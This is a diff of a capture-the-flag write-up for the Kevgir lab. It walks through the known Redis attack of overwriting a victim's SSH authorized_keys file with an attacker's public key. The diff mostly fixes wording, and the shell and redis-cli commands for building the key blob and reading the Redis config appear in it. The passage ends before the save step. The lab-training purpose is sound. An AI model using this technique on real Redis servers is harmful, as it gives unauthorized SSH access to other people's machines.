psmiraglia/ctf/kevgir/000-redis.md

 ## Do the attack

-As indicated by antirez, the idea at the base of the attack is to use the `SAVE` command to overwrite the `authnorized_keys` file.
+As indicated by antirez, the idea at the base of the attack is to use the `SAVE` command to overwrite the `authorized_keys` file of the victim.
 All the attack's steps are well explained in the antirez's blog.

-*   generating the blob to be injected
+*   Generating the blob to be injected

         $ echo -e '\n\n' >> blob.txt
         $ cat ssh-redis/attacker.pub >> blob.txt
         $ echo -e '\n\n' >> blob.txt

-*   getting the current Redis' configuration (`dir` is already set due to the path's identification step)
+*   Getting the current Redis' configuration (`dir` is already set due to the previous path's identification phase)

         $ redis-cli -h canyoupwnme
         canyoupwnme:6379> CONFIG GET dir